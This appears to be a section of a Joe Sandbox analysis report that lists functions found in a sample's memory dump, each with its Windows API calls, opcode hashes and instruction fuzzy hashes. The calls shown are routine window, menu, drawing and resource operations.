Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$EmptyInvert$ClientH_prolog3
String ID:
API String ID: 1656078942-0
Opcode ID: 97c2804bc7a32f51f289e35149e5867e9474f187c450d25ec5f9b0e4b20f6639
Instruction ID: 3c38214142669baea0a0ed30f2ef33d891d9933b5c339e9105a18981a4b84d7a
Opcode Fuzzy Hash: 97c2804bc7a32f51f289e35149e5867e9474f187c450d25ec5f9b0e4b20f6639
Instruction Fuzzy Hash: 1A21E971900249EFCB01DFA9D885AEEBBB5FF49350F10407AE805EA211EB74AB45DB60

Function 00BFA086 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BFA08D
DestroyMenu.USER32(?,00000004,00BFA4DB), ref: 00BFA0C9
IsWindow.USER32(?), ref: 00BFA0DA
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00BFA0EE
~_Task_impl.LIBCPMT ref: 00BFA167

Part of subcall function 00C5DA9D: GetParent.USER32(?), ref: 00C5DB03

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: DestroyH_prolog3MenuMessageParentSendTask_implWindow
String ID:
API String ID: 1857064102-0
Opcode ID: 827281dee135eec4593cf6f2b2fd3e9e055ecfdbb0fa4b449e2b0e60e94ef582
Instruction ID: d1314b40a244b47959366ac6e5731f6680072ba7564f4017b7b69670c02cf17b
Opcode Fuzzy Hash: 827281dee135eec4593cf6f2b2fd3e9e055ecfdbb0fa4b449e2b0e60e94ef582
Instruction Fuzzy Hash: 0331C270401784CEC726EB74C5447BEBBF5AF55304F14088DE49A17282DFB52645EB22

Function 00BFF4E8 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BE240F: GetWindowLongA.USER32(?,000000F0), ref: 00BE241A

SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00BFF54F
SendMessageA.USER32(?,00000086,00000000,00000000), ref: 00BFF566
GetDesktopWindow.USER32 ref: 00BFF56A
SendMessageA.USER32(00000000,0000036D,0000000C,00000000), ref: 00BFF58B
GetWindow.USER32(00000000), ref: 00BFF590

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: 62f563da840d101b1f7e0549436763f4fdb4da0f3fbb19e444036643d42d71f3
Instruction ID: 64dab2178bd284b40bf78ecd860fc33c97039763e4f451f8933b9f0f4f9d9aa5
Opcode Fuzzy Hash: 62f563da840d101b1f7e0549436763f4fdb4da0f3fbb19e444036643d42d71f3
Instruction Fuzzy Hash: 5211233224074B7BEB316F658C86F7E3AE8EF60750F1501B4FB426E1E1DAA1D848C694

Function 00BFC30B Relevance: 7.6, APIs: 5, Instructions: 68windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,00004212,00000001), ref: 00BFC345
EnableMenuItem.USER32(?,00004213,00000000), ref: 00BFC351
EnableMenuItem.USER32(?,00004214,00000000), ref: 00BFC37D
CheckMenuItem.USER32(?,00004213,00000008), ref: 00BFC3A6
CheckMenuItem.USER32(?,00004214,00000000), ref: 00BFC3B2

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ItemMenu$Enable$Check
String ID:
API String ID: 1852492618-0
Opcode ID: 576601ad879eabe394d725e9cc17dc8440c208a8324634730a7dc7363840cc36
Instruction ID: d71fb75dd9c7ce615a577564c2288ef973d5a67eea8163b4d008bb5f03eb6623
Opcode Fuzzy Hash: 576601ad879eabe394d725e9cc17dc8440c208a8324634730a7dc7363840cc36
Instruction Fuzzy Hash: CE118631240608AFDB14AB11DD82F667BE9FF94B10F518465FB069B1A1C670E884DA64

Function 00C230FF Relevance: 7.6, APIs: 5, Instructions: 68stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00C2314B
SendMessageA.USER32(?,00001204,00000000,00000002), ref: 00C2316F
lstrlenA.KERNEL32(00000000), ref: 00C23178
SendMessageA.USER32(?,00001204,00000001,00000002), ref: 00C23196
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00C231AF

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSendlstrlen$Exception@8H_prolog3RedrawThrowWindow
String ID:
API String ID: 524015339-0
Opcode ID: bf0d7a3785197b90e95fbd3726909b5a381bf634fb63c5bd3210b555285e1ef2
Instruction ID: fbcc83cf441e22c22626a4fd6d9dc6451281312a191e2138cd9857eea6b32cc0
Opcode Fuzzy Hash: bf0d7a3785197b90e95fbd3726909b5a381bf634fb63c5bd3210b555285e1ef2
Instruction Fuzzy Hash: D0214735600214AFDB11EF68DC89FEEBBF5FF88710F150129E599AB2A0DB70A910CB54

Function 00C0D1EB Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 00C0D222
GetParent.USER32(?), ref: 00C0D23F
GetClientRect.USER32(?,?), ref: 00C0D24E
GetParent.USER32(?), ref: 00C0D257
MapWindowPoints.USER32(?,?,?,00000002), ref: 00C0D26C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ParentRect$ClientFillPointsWindow
String ID:
API String ID: 3058756167-0
Opcode ID: 0f328191e100569f4f9feaf75c558c715a4def9baf2cc4d8db69a0c887e96c1e
Instruction ID: 65629850841a71fa1e6c32d9f41218dd67b689e6506865467f7ec2e79e1b8510
Opcode Fuzzy Hash: 0f328191e100569f4f9feaf75c558c715a4def9baf2cc4d8db69a0c887e96c1e
Instruction Fuzzy Hash: 4E215C71900209AFCB10EFA4CC49DAFBBB5FF49310B104569F806AB261EB71AE01CF91

Function 00BFFCF2 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 00BFFD6C
GlobalAddAtomA.KERNEL32(?), ref: 00BFFD7B
GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 00BFFD91
GlobalAddAtomA.KERNEL32(?), ref: 00BFFD9A
SendMessageA.USER32(?,000003E4,?,?), ref: 00BFFDC4

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: e5eefce77c3dadde21fe83f8018e1622a43effd1dd02e429329c2865e41932bd
Instruction ID: 9169a70b4578b8dae2de4e43d2a454c173bf27fd509da4b70e3a8ac18e7f6850
Opcode Fuzzy Hash: e5eefce77c3dadde21fe83f8018e1622a43effd1dd02e429329c2865e41932bd
Instruction Fuzzy Hash: E6215E75900218AACB24DB69C845BFAB3F8EF18740F4044AAE699D7191DBB4EEC4CB50

Function 00BD6583 Relevance: 7.6, APIs: 5, Instructions: 65windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BD658A
__CxxThrowException@8.LIBCMT ref: 00BD65CF
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,00BD7426,00000000,00000000,00000000,?,00BD7426,00D1A5E4,00000004,00BD2D88,00BD7426,?,00BD7426), ref: 00BD65FA
__cftof.LIBCMT ref: 00BD6618

Part of subcall function 00CC7D9B: __mbsnbcpy_s_l.LIBCMT ref: 00CC7DAE

LocalFree.KERNEL32(00BD7426,00BD2D88,00BD7426,?,00BD7426), ref: 00BD6629

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof__mbsnbcpy_s_l
String ID:
API String ID: 3752339156-0
Opcode ID: 8835fb92e303b354ffe5c01f591665907d94ca08bc3313564ba9ac210d1b9184
Instruction ID: 621178d0f233588bbe56085048cc2d2575a3ffa94c94a61395898431c9ea7e51
Opcode Fuzzy Hash: 8835fb92e303b354ffe5c01f591665907d94ca08bc3313564ba9ac210d1b9184
Instruction Fuzzy Hash: 2711D3B2904349AFDB01DFA4CC81FAEBBE8FF04714F11856AF5248A291E770DD408B91

Function 00CA949A Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CA94A1
SetRectEmpty.USER32(?), ref: 00CA9556
CreateCompatibleDC.GDI32(00000000), ref: 00CA9559
SetRectEmpty.USER32(?), ref: 00CA9578
CreatePen.GDI32(00000000,00000001,?), ref: 00CA9583

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CreateEmptyH_prolog3Rect$CompatibleException@8Throw
String ID:
API String ID: 2318760352-0
Opcode ID: 3404b34c6b7af0a2016db341afae1ec13f56d9c413d8a7218e615e031a0bbf78
Instruction ID: 772671b83a3f73c5bdd95cfc37c1259c1edd54adbdf01e2f5bd164add65df3f9
Opcode Fuzzy Hash: 3404b34c6b7af0a2016db341afae1ec13f56d9c413d8a7218e615e031a0bbf78
Instruction Fuzzy Hash: 5C21A0B0801B418AD721DF6AC981B9AFAE8BFA4300F00894FE1AE97211DBB065459F21

Function 00C1FC91 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,0000003C,?), ref: 00C1FCC5
CreateFontIndirectA.GDI32(?), ref: 00C1FCDA
IsWindow.USER32(?), ref: 00C1FCF8
InvalidateRect.USER32(?,00000000,00000001), ref: 00C1FD16
UpdateWindow.USER32(?), ref: 00C1FD1F

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$CreateFontIndirectInvalidateObjectRectUpdate
String ID:
API String ID: 1602852816-0
Opcode ID: 67864ddf03dfebf5875559ae1ea112d2f4bf67123ab7e3d09359c7f1189b0267
Instruction ID: 0353f6294558d5b19531669fe55560d1e4d3f1f65dd01ed23528b54d1537e98e
Opcode Fuzzy Hash: 67864ddf03dfebf5875559ae1ea112d2f4bf67123ab7e3d09359c7f1189b0267
Instruction Fuzzy Hash: 8111B231200205ABD720AF74DC49FAEBBB8BF45300F04042DB50696260EF70ED45EB50

Function 00BF43FB Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BF4402
GetWindowRect.USER32(?,?), ref: 00BF4443
CreateRoundRectRgn.GDI32(00000000,00000000,?,?,00000004,00000004), ref: 00BF446D
SetWindowRgn.USER32(?,?,00000000), ref: 00BF4483
SetWindowRgn.USER32(?,00000000,00000000), ref: 00BF449F

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Rect$CreateH_prolog3_Round
String ID:
API String ID: 2502471913-0
Opcode ID: 9328c1ce0b5ca4f8288690a3e31561acd45c5b6ae232bad54963f05dfc27c19a
Instruction ID: c8ce7785011029ae1fe5758683161fe06149d7b754985c9abd944525991c283e
Opcode Fuzzy Hash: 9328c1ce0b5ca4f8288690a3e31561acd45c5b6ae232bad54963f05dfc27c19a
Instruction Fuzzy Hash: 7D112971800249DFDB20DFA5C989AEEFBF8FF89710F14025EE652B6260DB346901DB24

Function 00C136C7 Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

SetCapture.USER32(?), ref: 00C136DF
GetCursorPos.USER32(?), ref: 00C1371E
LoadCursorA.USER32(00000000,00007F86), ref: 00C13748
SetCursor.USER32(00000000), ref: 00C1374F
GetCursorPos.USER32(?), ref: 00C1375C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Cursor$CaptureLoad
String ID:
API String ID: 1460996051-0
Opcode ID: cad6c545bb6012f42441b83298e1b764e53cbf3e30a283a9c3b27b390cde1f3f
Instruction ID: e3e1d1f9f1d25639bda19ea6c969eed65f6ccb035ff3f6b5c2a6609970c8b26c
Opcode Fuzzy Hash: cad6c545bb6012f42441b83298e1b764e53cbf3e30a283a9c3b27b390cde1f3f
Instruction Fuzzy Hash: 8E11A7716007449FDB24AB78C85CFDAB7E9BF56315F00046DF19AC7291DB70A940DB91

Function 00C2A1F9 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C2A205
SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00C2A231
SendMessageA.USER32(?,00000150,?,00000000), ref: 00C2A244
SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00C2A25E
SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00C2A271

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$Exception@8H_prolog3ThrowWindow
String ID:
API String ID: 1622667542-0
Opcode ID: 6a42e9a68288268033466f1d2944faee25c28417224cef58acae0cca0d068b42
Instruction ID: 22971775fe187100a641190454fe1335d0832c36289bf292b7ca463b63a0415e
Opcode Fuzzy Hash: 6a42e9a68288268033466f1d2944faee25c28417224cef58acae0cca0d068b42
Instruction Fuzzy Hash: BD019231B00215FFEB155B70DC45F59BAB9FB48780F100121B608E69A0E6B1ED109B90

Function 00BE2F51 Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?), ref: 00BE2F7D
_memset.LIBCMT ref: 00BE2F9A
GetWindowTextA.USER32(00000000,00000000,00000100), ref: 00BE2FB4
lstrcmpA.KERNEL32(00000000,?,?,?), ref: 00BE2FC6
SetWindowTextA.USER32(00000000,?), ref: 00BE2FD2

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: e188ed4d4f559589535a1267ac068c5afa3015c250954b97f22d9a70df62e6b7
Instruction ID: 5d3506414607c61160fc094b0dc42c9d3f9a6f9fa39556c367d4e5b7618133eb
Opcode Fuzzy Hash: e188ed4d4f559589535a1267ac068c5afa3015c250954b97f22d9a70df62e6b7
Instruction Fuzzy Hash: 120196B65042986BCB10AB65DC84FDE77BCEB58740F0401A5F946D7141DAB4EE848BB1

Function 00C247E3 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C247EA
IsWindow.USER32(?), ref: 00C24811
InflateRect.USER32(?,00000000,000000FF), ref: 00C2482D
InvalidateRect.USER32(?,?,00000001), ref: 00C24842
UpdateWindow.USER32(?), ref: 00C24851

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: RectWindow$H_prolog3_InflateInvalidateUpdate
String ID:
API String ID: 2146894351-0
Opcode ID: 818b07dc4ea28130885bc167cc7471e4a5c16f18f6ee258c234183b2729a7e73
Instruction ID: 36a3f17aa3fb801558a7f00fe638d9100ba76a606c5aec6497b092ddab1c3086
Opcode Fuzzy Hash: 818b07dc4ea28130885bc167cc7471e4a5c16f18f6ee258c234183b2729a7e73
Instruction Fuzzy Hash: 2311E971600254DFDB04DFA4CDD5FA937B5BF09310F0846A9FA15AF2A6CB71A904CB21

Function 00C55687 Relevance: 7.6, APIs: 5, Instructions: 53threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C5568E
EnterCriticalSection.KERNEL32(00D345FC,00000000,00BF12EB,00000001), ref: 00C556EA
__beginthread.LIBCMT ref: 00C55704
SetThreadPriority.KERNEL32(00000000,000000FF), ref: 00C5571D
LeaveCriticalSection.KERNEL32(00D345FC), ref: 00C55734

Part of subcall function 00C2FC15: __EH_prolog3.LIBCMT ref: 00C2FC1C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: CriticalH_prolog3Section$EnterLeavePriorityThread__beginthread
String ID:
API String ID: 4118814795-0
Opcode ID: 5f3f4d3770bb749558926847fed829d6a70c390e07dcca1ad254c99d1b214a54
Instruction ID: cb1d2026d8aec43415329735f96fd07eb9459abfa631e82f941ca30992ec2c3f
Opcode Fuzzy Hash: 5f3f4d3770bb749558926847fed829d6a70c390e07dcca1ad254c99d1b214a54
Instruction Fuzzy Hash: 1C11A775C04B50DBC720AF24AC99A5D3A60AF15772B200319F835CA3F1DB3496C5CBAA

Function 00C326F3 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,75846BA0), ref: 00C32717
LoadResource.KERNEL32(?,00000000,?,00C345A6,?,?,?,00000084,00C3497A,0000000A,0000000A,0000000A,00000014,00C2C9D8,00000004,00C2722F), ref: 00C3272D
LockResource.KERNEL32(00000000,?,?,00C345A6,?,?,?,00000084,00C3497A,0000000A,0000000A,0000000A,00000014,00C2C9D8,00000004,00C2722F), ref: 00C3273C
FreeResource.KERNEL32(?,00000000,00000000,?,?,00C345A6,?,?,?,00000084,00C3497A,0000000A,0000000A,0000000A,00000014,00C2C9D8), ref: 00C3274D
SizeofResource.KERNEL32(?,00000000,?,?,00C345A6,?,?,?,00000084,00C3497A,0000000A,0000000A,0000000A,00000014,00C2C9D8,00000004), ref: 00C3275A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Resource$FindFreeLoadLockSizeof
String ID:
API String ID: 4159136517-0
Opcode ID: df00d40b3fae93e7aba9ef7a6a7ffcfb34fc161b7c11c42aef19d77cef8100b2
Instruction ID: 75b1dc3a5c7070d5570fefc8f3915ff48f056f009bd579fd9221fdc306f9ae89
